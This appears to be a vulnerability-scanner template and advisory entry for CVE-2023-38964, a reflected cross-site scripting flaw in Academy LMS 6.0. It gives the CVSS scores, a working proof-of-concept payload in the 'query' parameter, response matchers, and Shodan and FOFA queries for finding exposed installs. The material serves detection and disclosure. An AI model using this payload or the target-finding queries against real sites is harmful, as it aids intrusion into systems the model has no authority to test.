6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
30.9%
Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.
id: CVE-2023-38964
info:
name: Academy LMS 6.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Apply the latest security patches provided by the vendor to mitigate the XSS vulnerability in Creative Item Academy LMS 6.0.
reference:
- https://vida03.gitbook.io/redteam/web/cve-2023-38964
- https://nvd.nist.gov/vuln/detail/CVE-2023-38964
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-38964
cwe-id: CWE-79
epss-score: 0.00071
epss-percentile: 0.30433
cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: creativeitem
product: academy_lms
shodan-query: http.html:"academy lms"
fofa-query:
- body="Academy LMS"
- body="academy lms"
tags: cve2023,cve,academylms,xss,creativeitem
http:
- method: GET
path:
- '{{BaseURL}}/home/courses?query="><svg+onload=alert(document.domain)>'
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains_all(body, "<svg onload=alert(document.domain)>", "All courses</span>")'
condition: and
# digest: 4a0a00473045022100e604c0ad2fcb45b147262455b08d0bf158d5cc71cabb5a521fd1cb050c959ff802204279a912eb299e0c11b5b2ab85bcfe0464dad43cda5f4b9ca6fa37f3d49b1be1:922c64590222798bb761d5b6d8e72950